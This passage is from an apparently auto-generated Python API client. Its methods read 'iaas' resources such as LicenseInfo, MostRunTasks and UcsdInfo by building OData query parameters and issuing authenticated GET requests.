:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IaasLicenseInfoList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_iaas_license_info_list_with_http_info(
**kwargs) # noqa: E501
    def get_iaas_license_info_list_with_http_info(self,
                                                  **kwargs):  # noqa: E501
        """Read a 'iaas.LicenseInfo' resource. # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_iaas_license_info_list_with_http_info(async_req=True)
        >>> result = thread.get()
        :param async_req bool: execute request asynchronously
        :param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
        :param str orderby: Determines what properties are used to sort the collection of resources.
        :param int top: Specifies the maximum number of resources to return in the response.
        :param int skip: Specifies the number of resources to skip in the response.
        :param str select: Specifies a subset of properties to return.
        :param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
        :param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
        :param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
        :param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
        :param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(IaasLicenseInfoList, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # NOTE: locals() must be captured before any other local is bound; at
        # this point it holds exactly {'self', 'kwargs'}. Validated keyword
        # arguments are merged into this dict below.
        local_var_params = locals()
        # Full set of keyword arguments this endpoint accepts (query options
        # plus the generic client-control parameters appended next).
        all_params = [
            'filter', 'orderby', 'top', 'skip', 'select', 'expand', 'apply',
            'count', 'inlinecount', 'at'
        ]  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # Reject any keyword argument that is not a documented parameter, then
        # flatten the accepted ones into local_var_params.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError("Got an unexpected keyword argument '%s'"
                                   " to method get_iaas_license_info_list" %
                                   key)
            local_var_params[key] = val
        del local_var_params['kwargs']
        collection_formats = {}
        path_params = {}
        query_params = []
        # Map each supplied client-side argument onto its OData query option
        # (e.g. 'filter' -> '$filter'); unset arguments are omitted entirely.
        if 'filter' in local_var_params and local_var_params[
                'filter'] is not None:  # noqa: E501
            query_params.append(
                ('$filter', local_var_params['filter']))  # noqa: E501
        if 'orderby' in local_var_params and local_var_params[
                'orderby'] is not None:  # noqa: E501
            query_params.append(
                ('$orderby', local_var_params['orderby']))  # noqa: E501
        if 'top' in local_var_params and local_var_params[
                'top'] is not None:  # noqa: E501
            query_params.append(
                ('$top', local_var_params['top']))  # noqa: E501
        if 'skip' in local_var_params and local_var_params[
                'skip'] is not None:  # noqa: E501
            query_params.append(
                ('$skip', local_var_params['skip']))  # noqa: E501
        if 'select' in local_var_params and local_var_params[
                'select'] is not None:  # noqa: E501
            query_params.append(
                ('$select', local_var_params['select']))  # noqa: E501
        if 'expand' in local_var_params and local_var_params[
                'expand'] is not None:  # noqa: E501
            query_params.append(
                ('$expand', local_var_params['expand']))  # noqa: E501
        if 'apply' in local_var_params and local_var_params[
                'apply'] is not None:  # noqa: E501
            query_params.append(
                ('$apply', local_var_params['apply']))  # noqa: E501
        if 'count' in local_var_params and local_var_params[
                'count'] is not None:  # noqa: E501
            query_params.append(
                ('$count', local_var_params['count']))  # noqa: E501
        if 'inlinecount' in local_var_params and local_var_params[
                'inlinecount'] is not None:  # noqa: E501
            query_params.append(
                ('$inlinecount',
                 local_var_params['inlinecount']))  # noqa: E501
        # 'at' is the only option sent without the '$' prefix.
        if 'at' in local_var_params and local_var_params[
                'at'] is not None:  # noqa: E501
            query_params.append(('at', local_var_params['at']))  # noqa: E501
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept([
            'application/json', 'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ])  # noqa: E501
        # Authentication setting
        auth_settings = ['cookieAuth', 'oAuth2']  # noqa: E501
        # Delegate transport, (de)serialization and async dispatch to the
        # shared api_client; response is deserialized as IaasLicenseInfoList.
        return self.api_client.call_api(
            '/iaas/LicenseInfos',
            'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='IaasLicenseInfoList',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get(
                '_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_iaas_most_run_tasks_by_moid(self, moid, **kwargs): # noqa: E501
"""Read a 'iaas.MostRunTasks' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_most_run_tasks_by_moid(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IaasMostRunTasks
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_iaas_most_run_tasks_by_moid_with_http_info(
moid, **kwargs) # noqa: E501
    def get_iaas_most_run_tasks_by_moid_with_http_info(self, moid,
                                                       **kwargs):  # noqa: E501
        """Read a 'iaas.MostRunTasks' resource. # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_iaas_most_run_tasks_by_moid_with_http_info(moid, async_req=True)
        >>> result = thread.get()
        :param async_req bool: execute request asynchronously
        :param str moid: The unique Moid identifier of a resource instance. (required)
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(IaasMostRunTasks, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # NOTE: locals() must be captured before any other local is bound; at
        # this point it holds exactly {'self', 'moid', 'kwargs'}.
        local_var_params = locals()
        all_params = ['moid']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # Reject any keyword argument that is not a documented parameter, then
        # flatten the accepted ones into local_var_params.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_iaas_most_run_tasks_by_moid" % key)
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'moid' is set
        if self.api_client.client_side_validation and (
                'moid' not in local_var_params or  # noqa: E501
                local_var_params['moid'] is None):  # noqa: E501
            raise ApiValueError(
                "Missing the required parameter `moid` when calling `get_iaas_most_run_tasks_by_moid`"
            )  # noqa: E501
        collection_formats = {}
        path_params = {}
        # 'moid' is substituted into the {Moid} placeholder of the URL path.
        if 'moid' in local_var_params:
            path_params['Moid'] = local_var_params['moid']  # noqa: E501
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept([
            'application/json', 'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ])  # noqa: E501
        # Authentication setting
        auth_settings = ['cookieAuth', 'oAuth2']  # noqa: E501
        # Delegate transport, (de)serialization and async dispatch to the
        # shared api_client; response is deserialized as IaasMostRunTasks.
        return self.api_client.call_api(
            '/iaas/MostRunTasks/{Moid}',
            'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='IaasMostRunTasks',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get(
                '_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_iaas_most_run_tasks_list(self, **kwargs): # noqa: E501
"""Read a 'iaas.MostRunTasks' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_most_run_tasks_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IaasMostRunTasksList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_iaas_most_run_tasks_list_with_http_info(
**kwargs) # noqa: E501
    def get_iaas_most_run_tasks_list_with_http_info(self,
                                                    **kwargs):  # noqa: E501
        """Read a 'iaas.MostRunTasks' resource. # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_iaas_most_run_tasks_list_with_http_info(async_req=True)
        >>> result = thread.get()
        :param async_req bool: execute request asynchronously
        :param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
        :param str orderby: Determines what properties are used to sort the collection of resources.
        :param int top: Specifies the maximum number of resources to return in the response.
        :param int skip: Specifies the number of resources to skip in the response.
        :param str select: Specifies a subset of properties to return.
        :param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
        :param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
        :param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
        :param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
        :param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(IaasMostRunTasksList, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # NOTE: locals() must be captured before any other local is bound; at
        # this point it holds exactly {'self', 'kwargs'}. Validated keyword
        # arguments are merged into this dict below.
        local_var_params = locals()
        # Full set of keyword arguments this endpoint accepts (query options
        # plus the generic client-control parameters appended next).
        all_params = [
            'filter', 'orderby', 'top', 'skip', 'select', 'expand', 'apply',
            'count', 'inlinecount', 'at'
        ]  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # Reject any keyword argument that is not a documented parameter, then
        # flatten the accepted ones into local_var_params.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError("Got an unexpected keyword argument '%s'"
                                   " to method get_iaas_most_run_tasks_list" %
                                   key)
            local_var_params[key] = val
        del local_var_params['kwargs']
        collection_formats = {}
        path_params = {}
        query_params = []
        # Map each supplied client-side argument onto its OData query option
        # (e.g. 'filter' -> '$filter'); unset arguments are omitted entirely.
        if 'filter' in local_var_params and local_var_params[
                'filter'] is not None:  # noqa: E501
            query_params.append(
                ('$filter', local_var_params['filter']))  # noqa: E501
        if 'orderby' in local_var_params and local_var_params[
                'orderby'] is not None:  # noqa: E501
            query_params.append(
                ('$orderby', local_var_params['orderby']))  # noqa: E501
        if 'top' in local_var_params and local_var_params[
                'top'] is not None:  # noqa: E501
            query_params.append(
                ('$top', local_var_params['top']))  # noqa: E501
        if 'skip' in local_var_params and local_var_params[
                'skip'] is not None:  # noqa: E501
            query_params.append(
                ('$skip', local_var_params['skip']))  # noqa: E501
        if 'select' in local_var_params and local_var_params[
                'select'] is not None:  # noqa: E501
            query_params.append(
                ('$select', local_var_params['select']))  # noqa: E501
        if 'expand' in local_var_params and local_var_params[
                'expand'] is not None:  # noqa: E501
            query_params.append(
                ('$expand', local_var_params['expand']))  # noqa: E501
        if 'apply' in local_var_params and local_var_params[
                'apply'] is not None:  # noqa: E501
            query_params.append(
                ('$apply', local_var_params['apply']))  # noqa: E501
        if 'count' in local_var_params and local_var_params[
                'count'] is not None:  # noqa: E501
            query_params.append(
                ('$count', local_var_params['count']))  # noqa: E501
        if 'inlinecount' in local_var_params and local_var_params[
                'inlinecount'] is not None:  # noqa: E501
            query_params.append(
                ('$inlinecount',
                 local_var_params['inlinecount']))  # noqa: E501
        # 'at' is the only option sent without the '$' prefix.
        if 'at' in local_var_params and local_var_params[
                'at'] is not None:  # noqa: E501
            query_params.append(('at', local_var_params['at']))  # noqa: E501
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept([
            'application/json', 'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ])  # noqa: E501
        # Authentication setting
        auth_settings = ['cookieAuth', 'oAuth2']  # noqa: E501
        # Delegate transport, (de)serialization and async dispatch to the
        # shared api_client; response is deserialized as IaasMostRunTasksList.
        return self.api_client.call_api(
            '/iaas/MostRunTasks',
            'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='IaasMostRunTasksList',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get(
                '_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_iaas_ucsd_info_by_moid(self, moid, **kwargs): # noqa: E501
"""Read a 'iaas.UcsdInfo' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_ucsd_info_by_moid(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IaasUcsdInfo
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_iaas_ucsd_info_by_moid_with_http_info(
moid, **kwargs) # noqa: E501
    def get_iaas_ucsd_info_by_moid_with_http_info(self, moid,
                                                  **kwargs):  # noqa: E501
        """Read a 'iaas.UcsdInfo' resource. # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_iaas_ucsd_info_by_moid_with_http_info(moid, async_req=True)
        >>> result = thread.get()
        :param async_req bool: execute request asynchronously
        :param str moid: The unique Moid identifier of a resource instance. (required)
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(IaasUcsdInfo, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # NOTE: locals() must be captured before any other local is bound; at
        # this point it holds exactly {'self', 'moid', 'kwargs'}.
        local_var_params = locals()
        all_params = ['moid']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # Reject any keyword argument that is not a documented parameter, then
        # flatten the accepted ones into local_var_params.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError("Got an unexpected keyword argument '%s'"
                                   " to method get_iaas_ucsd_info_by_moid" %
                                   key)
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'moid' is set
        if self.api_client.client_side_validation and (
                'moid' not in local_var_params or  # noqa: E501
                local_var_params['moid'] is None):  # noqa: E501
            raise ApiValueError(
                "Missing the required parameter `moid` when calling `get_iaas_ucsd_info_by_moid`"
            )  # noqa: E501
        collection_formats = {}
        path_params = {}
        # 'moid' is substituted into the {Moid} placeholder of the URL path.
        if 'moid' in local_var_params:
            path_params['Moid'] = local_var_params['moid']  # noqa: E501
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept([
            'application/json', 'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ])  # noqa: E501
        # Authentication setting
        auth_settings = ['cookieAuth', 'oAuth2']  # noqa: E501
        # Delegate transport, (de)serialization and async dispatch to the
        # shared api_client; response is deserialized as IaasUcsdInfo.
        return self.api_client.call_api(
            '/iaas/UcsdInfos/{Moid}',
            'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='IaasUcsdInfo',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get(
                '_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_iaas_ucsd_info_list(self, **kwargs): # noqa: E501
"""Read a 'iaas.UcsdInfo' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_ucsd_info_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IaasUcsdInfoList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_iaas_ucsd_info_list_with_http_info(
**kwargs) # noqa: E501
def get_iaas_ucsd_info_list_with_http_info(self, **kwargs):  # noqa: E501
    """Read a 'iaas.UcsdInfo' resource. # noqa: E501

    Synchronous by default; pass async_req=True to get the request
    thread back instead of the result.

    >>> thread = api.get_iaas_ucsd_info_list_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str filter: OData $filter predicate selecting which resources to return.
    :param str orderby: Properties used to sort the collection of resources.
    :param int top: Maximum number of resources to return in the response.
    :param int skip: Number of resources to skip in the response.
    :param str select: Subset of properties to return.
    :param str expand: Additional attributes or related resources to return.
    :param str apply: Sequence of aggregation transformations ('aggregate',
        'groupby'), separated by forward slashes and applied in order.
    :param bool count: Return only the count of matching resources.
    :param str inlinecount: Request an inline count of matching resources
        alongside the resources in the response.
    :param str at: Filter on versioning-information properties; same
        expression grammar as $filter.
    :param _return_http_data_only: response data without head status code
        and headers
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        without reading/decoding. Default is True.
    :param _request_timeout: total timeout for this request, or a
        (connection, read) timeout pair.
    :return: tuple(IaasUcsdInfoList, status_code(int), headers(HTTPHeaderDict))
        If the method is called asynchronously, returns the request thread.
    """
    local_var_params = locals()

    # Endpoint-specific query options plus the request-control keywords
    # common to every generated operation.
    all_params = [
        'filter', 'orderby', 'top', 'skip', 'select', 'expand', 'apply',
        'count', 'inlinecount', 'at',
        'async_req', '_return_http_data_only', '_preload_content',
        '_request_timeout',
    ]

    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError("Got an unexpected keyword argument '%s'"
                               " to method get_iaas_ucsd_info_list" % key)
        local_var_params[key] = val
    del local_var_params['kwargs']

    collection_formats = {}
    path_params = {}

    # Map keyword arguments onto their wire-format query names; 'at' is
    # the only option without the OData '$' prefix.
    query_params = []
    for arg_name, wire_name in (
            ('filter', '$filter'), ('orderby', '$orderby'),
            ('top', '$top'), ('skip', '$skip'),
            ('select', '$select'), ('expand', '$expand'),
            ('apply', '$apply'), ('count', '$count'),
            ('inlinecount', '$inlinecount'), ('at', 'at')):
        if local_var_params.get(arg_name) is not None:
            query_params.append((wire_name, local_var_params[arg_name]))

    header_params = {
        'Accept': self.api_client.select_header_accept([
            'application/json', 'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ]),
    }
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = ['cookieAuth', 'oAuth2']  # noqa: E501

    return self.api_client.call_api(
        '/iaas/UcsdInfos',
        'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='IaasUcsdInfoList',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get(
            '_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_iaas_ucsd_managed_infra_by_moid(self, moid, **kwargs):  # noqa: E501
    """Read a 'iaas.UcsdInfra' resource by Moid. # noqa: E501

    Read a 'iaas.UcsdManagedInfra' resource. Synchronous by default;
    pass async_req=True to get the request thread back instead.

    >>> thread = api.get_iaas_ucsd_managed_infra_by_moid(moid, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str moid: The unique Moid identifier of a resource instance. (required)
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        without reading/decoding. Default is True.
    :param _request_timeout: total timeout for this request, or a
        (connection, read) timeout pair.
    :return: IaasUcsdManagedInfra
        If the method is called asynchronously, returns the request thread.
    """
    # Convenience wrapper: callers want only the deserialized body, not
    # the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    return self.get_iaas_ucsd_managed_infra_by_moid_with_http_info(
        moid, **kwargs)
def get_iaas_ucsd_managed_infra_by_moid_with_http_info(self, moid, **kwargs):  # noqa: E501
    """Read a 'iaas.UcsdManagedInfra' resource. # noqa: E501

    Synchronous by default; pass async_req=True to get the request
    thread back instead of the result.

    >>> thread = api.get_iaas_ucsd_managed_infra_by_moid_with_http_info(moid, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str moid: The unique Moid identifier of a resource instance. (required)
